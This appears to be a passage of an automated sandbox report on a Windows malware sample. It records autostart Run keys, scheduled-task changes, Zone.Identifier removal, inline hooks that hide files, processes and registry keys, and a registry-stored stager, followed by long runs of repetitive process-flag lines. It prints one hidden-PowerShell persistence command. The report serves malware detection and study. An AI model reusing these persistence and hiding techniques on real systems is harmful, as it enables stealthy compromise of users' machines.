Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Creates autostart registry keys with suspicious names
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Creates job files (autostart)
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\System32\Tasks\$rbx-9pdB1aHK
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete
Hooks files or directories query functions (used to hide files and directories)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Hooks processes query functions (used to hide processes)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Stores large binary data to the registry
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $rbx-stager
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
